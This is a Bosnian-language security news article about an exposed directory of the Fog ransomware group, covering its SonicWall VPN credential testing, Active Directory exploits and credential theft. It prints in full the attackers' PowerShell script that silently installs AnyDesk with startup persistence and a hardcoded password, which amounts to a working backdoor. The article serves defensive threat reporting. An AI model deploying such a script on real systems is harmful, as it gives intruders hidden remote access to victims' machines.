Analitičari sajber sigurnosti otkrili su otvoreni direktorij povezan s grupom ransomware-a Fog, otkrivajući sveobuhvatan alat koji koriste hakeri za kompromitaciju korporativnih mreža.
Direktorij, otkriven u decembru 2024. i smješten na IP adresi 194.48.154.79:80, sadrži arsenal alata dizajniranih za izviđanje, eksploataciju, bočno kretanje i istrajnost unutar okruženja žrtve.
Ovo otkriće pruža rijedak uvid u operativnu metodologiju podružnica ransomware-a, pokazujući kako koriste i prilagođene i javno dostupne alate za izvođenje svojih kampanja.
Grupa Fog ransomware-a, prvi put uočena sredinom 2024. godine, ciljala je organizacije u više sektora, uključujući tehnologiju, obrazovanje, maloprodaju i logistiku.
Geografska distribucija žrtava obuhvata Evropu, Sjevernu Ameriku i Južnu Ameriku, s posebnom koncentracijom u Italiji, Grčkoj, Brazilu i SAD-u.
Analiza sadržaja direktorija otkrila je da je početni pristup mrežama žrtava prvenstveno postignut putem kompromitovanih SonicWall VPN akreditiva, nakon čega je uslijedilo sistematsko iskorištavanje Active Directory okruženja kako bi se dobile privilegije administratora domene.
Analitičari DFIR Reporta identifikovali su Python skriptu unutar direktorijuma posebno dizajniranu za testiranje kompromitovanih SonicWall VPN akreditiva.
Skripta, koja se nalazi u datoteci pod nazivom “sonic_scan/main.py”, automatizuje proces autentikacije na SonicWall VPN uređajima i izvršava skeniranje portova kako bi identifikovala potencijalne ulazne tačke u mreže žrtava.
.webp)
Ova tehnika je u skladu sa prethodnim nalazima koji povezuju upotrebu kompromitovanih SonicWall akreditiva sa Fog Ransomware operacijama.
Ono što ovo otkriće čini posebno zabrinjavajućim je sveobuhvatna priroda kompleta alata, koji uključuje višestruke eksploatacije za ranjivosti Active Directory-a kao što su Zerologon (CVE-2020-1472) i propuste u oponašanju kontrolera domena (CVE-2021-42278 i CVE-2021-42287).
Ovi alati omogućavaju hakerima da brzo eskaliraju privilegije unutar ugroženih okruženja, prelazeći od početnog pristupa do dominacije domenom u relativno kratkim vremenskim okvirima.
Komplet alata takođe uključuje specijalizovane uslužne programe za krađu akreditiva kao što je DonPAPI, koji mogu da ekstrahuju akreditive zaštićene Windows API za zaštitu podataka (DPAPI) iz različitih izvora, uključujući lozinke pretraživača, kolačiće, sertifikate i Windows menadžer akreditiva.
.webp)
Ovaj sveobuhvatan pristup kredencijalima dodatno olakšava napadaču mogućnost da se kreće bočno kroz mreže.
Postojanost kroz automatizovani daljinski pristup
Značajan aspekt rada Fog ransomware-a je njegov mehanizam postojanosti putem legitimnog alata za daljinski pristup AnyDesk .
Direktorij je sadržavao PowerShell skriptu pod nazivom “any.ps1” koja automatizuje instalaciju i konfiguraciju AnyDeska sa tvrdo kodiranom lozinkom.
Ovaj pristup osigurava da ahakeri zadrže pristup kompromitovanim sistemima čak i ako je njihova početna ulazna tačka sanirana.
Skripta funkcionira tako što kreira direktorij u C:\ProgramData\AnyDesk, preuzima izvršni fajl AnyDesk sa službene web stranice, instalira ga uz postojanost pri pokretanju i postavlja unaprijed definiranu lozinku:-
Function AnyDesk {
mkdir "C:\ProgramData\AnyDesk"
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
cmd. exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
cmd. exe /c echo Admin#123 | C:\ProgramData\anydesk.exe --set-password
cmd. exe /c C:\ProgramData\AnyDesk.exe --get-id
}Ova taktika upornosti je posebno efikasna jer koristi legitiman softver koji možda neće pokrenuti sigurnosna upozorenja.
Koristeći službeni AnyDesk preuzimanje i implementirajući ga s parametrima pokretanja, akteri prijetnji stvaraju backdoor koji se pojavljuje kao normalan softver za daljinsku podršku mnogim sistemima za detekciju.
Otkriće ovog direktorija pruža vrijedne obavještajne podatke za organizacije koje se žele zaštititi od grupe Fog ransomware i naglašava važnost osiguranja VPN kredencijala i nadzora za neovlašćene alate za daljinski pristup .
Izvor: CyberSecurityNews